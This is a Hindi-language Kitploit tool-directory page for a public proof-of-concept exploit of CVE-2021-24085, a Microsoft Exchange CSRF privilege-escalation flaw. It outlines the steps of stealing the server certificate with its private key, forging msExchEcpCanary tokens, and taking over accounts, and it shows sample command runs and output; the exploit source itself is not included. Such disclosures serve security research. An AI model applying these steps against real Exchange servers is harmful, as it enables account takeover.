Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-24085 — CVE-2021-24085 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट: msExchEcpCanary टोकन जालसाजी के माध्यम से Microsoft Exchange Server में CSRF-आधारित विशेषाधिकार उन्नयन, जिससे खाता अधिग्रहण संभव होता है। | Kitploit
उपकरण/GitHubGitHub/sourceincite/cve-2021-24085
प्रमाणीकरण और प्राधिकरणभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubsourceincite/cve-2021-24085

CVE-2021-24085

CVE-2021-24085 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट: msExchEcpCanary टोकन जालसाजी के माध्यम से Microsoft Exchange Server में CSRF-आधारित विशेषाधिकार उन्नयन, जिससे खाता अधिग्रहण संभव होता है।

रिपॉजिटरी देखें
71185 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

माइक्रोसॉफ्ट एक्सचेंज सर्वर msExchEcpCanary क्रॉस साइट रिक्वेस्ट फोर्जरी विशेषाधिकार वृद्धि भेद्यता

यह CVE-2021-24085 के लिए एक प्रूफ ऑफ कॉन्सेप्ट है।

  1. poc.py लक्ष्य का सर्टिफिकेट फ़ाइल अंदर निजी कुंजी के साथ डाउनलोड करता है
  2. YellowCanary SID के आधार पर किसी विशिष्ट उपयोगकर्ता के लिए msExchEcpCanary csrf टोकन उत्पन्न करता है
  3. poc.js खाता अधिग्रहण को ट्रिगर करने के लिए csrf शोषण है

मैंने malicifest.xml फ़ाइल प्रदान नहीं की है, लेकिन आप नीचे संदर्भ अनुभाग में उपलब्ध संसाधनों से एक दुर्भावनापूर्ण मेनिफेस्ट फ़ाइल कैसे उत्पन्न करें, इसकी जानकारी पा सकते हैं।

उदाहरण

अंदर निजी कुंजी के साथ सर्टिफिकेट तक पहुंचें:

root@kitploit:~
researcher@srcincite:~$ ./poc.py
(+) usage: ./poc.py <target> <user:pass>
(+) eg: ./poc.py 192.168.75.142 [email protected]:user123###

researcher@srcincite:~$ ./poc.py 192.168.75.142 [email protected]:user123###
(+) found the thumbprint: F4EB6AADB8D7C0D12E756BA2E28F90CCACD41299
(+) exported the cert to the target filesystem
(+) saved the cert to testcert.der using password: hax

अब आप लक्ष्य उपयोगकर्ता के SID का उपयोग करके YellowCanary के साथ csrf टोकन उत्पन्न कर सकते हैं:

root@kitploit:~
c:\Users\researcher>poc.exe S-1-5-21-257332918-392067043-4020791575-3104 testcert.der hax

            #====================================================
            # YellowCanary - generate msExchEcpCanary csrf tokens
            #====================================================

security identifier : S-1-5-21-257332918-392067043-4020791575-3104
msExchEcpCanary     : sA0o0nS_C0G_PMdcA_dAd5BdAEL_-NcYhndaAwlhBJFs4a4iKy4sn53azH-O5Ix3F0jnwzZZUsk.

संदर्भ:

  • https://www.mdsec.co.uk/2019/01/abusing-office-web-add-ins-for-fun-and-limited-profit/
  • https://info.phishlabs.com/blog/office-365-phishing-uses-malicious-app-persist-password-reset
टूल डाउनलोड करें